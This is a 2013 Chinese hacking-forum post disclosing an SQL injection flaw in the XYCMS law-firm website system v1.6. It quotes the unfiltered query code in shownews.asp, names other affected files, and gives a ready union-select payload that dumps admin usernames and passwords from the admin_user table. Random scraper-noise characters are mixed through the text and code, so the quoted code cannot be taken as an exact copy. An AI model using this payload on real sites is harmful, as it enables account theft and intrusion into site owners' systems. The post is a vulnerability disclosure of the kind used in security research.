中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似, m9 L' D3 Y- ?% j  P

0 u# Y- d5 P" |  x, X淫荡分割线: Y0 U# _( \1 C. H6 v5 z$ }7 k
--------------------------------------------------------# P8 u6 r7 x. s! d) T
7 e8 i! [* A5 S
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)+ a3 _& u5 K# s9 _; N: L
源码地址:http://down.chinaz.com/soft/29233.htm
' P/ c1 F# f; }3 P % {+ G% u$ K* |0 f- }
漏洞文件:shownews.asp+ z# C: z: g( t# {
漏洞代码:7-13行
- @, e8 \3 `3 ^ : q9 S0 K& X7 D  x9 f$ j

/ W: q  C+ l  Q! K# S8 y3 p7 V" x7 o<%
# r* L: D- E% B6 B, @0 `. lid=request.QueryString("id")
  B0 K/ u' S6 {   
* U2 e9 y+ L6 dset snews=server.createobject("adodb.recordset") 9 Z/ ?. w2 N& `7 D; n( j
exec="select * from [news] where id="&id
& d; V5 o, ?! g6 Z* nsnews.open exec,conn,1,1
8 E9 [% Q# B! R: G' X+ z$ u%>
* w+ |6 o" c7 x
$ l8 L# A: H% b  P 8 i% w4 B  N5 h/ p% |# |
什么过滤都没有  直造成注入
9 L" H! |0 J2 F( } & u' T" K3 D+ p' i$ v- D' u
注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 t9 t7 a+ q! `+ e2 v8 o7 }: H 5 N, U/ D. S1 v8 ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
) H( v- G+ D' W+ E& @0 t, a
7 w/ I/ b5 }# Z4 T  h2 U % m/ v; R" C$ w8 _( O" j/ k
exp: union select 1,admin,password,4,5,7 from admin_user
5 [9 ~: G9 S' b1 L* r' m1 X+ I* n





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2